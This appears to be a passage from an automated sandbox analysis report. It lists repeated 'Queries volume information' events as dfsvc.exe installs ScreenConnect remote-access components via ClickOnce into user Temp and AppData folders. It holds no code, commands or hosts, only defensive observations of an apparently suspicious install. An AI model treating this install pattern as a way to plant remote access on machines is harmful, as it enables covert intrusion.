                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Core.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Client.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Core.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Client.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Core.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\Y2PJL7H9.NEK\KD5MK54C.NHR\ScreenConnect.Client.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.Client.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.Core.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.Windows.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.Core.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.Core.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.Windows.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.Client.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.Client.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.Core.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.Windows.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.Client.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.Core.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.Windows.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.dll VolumeInformation
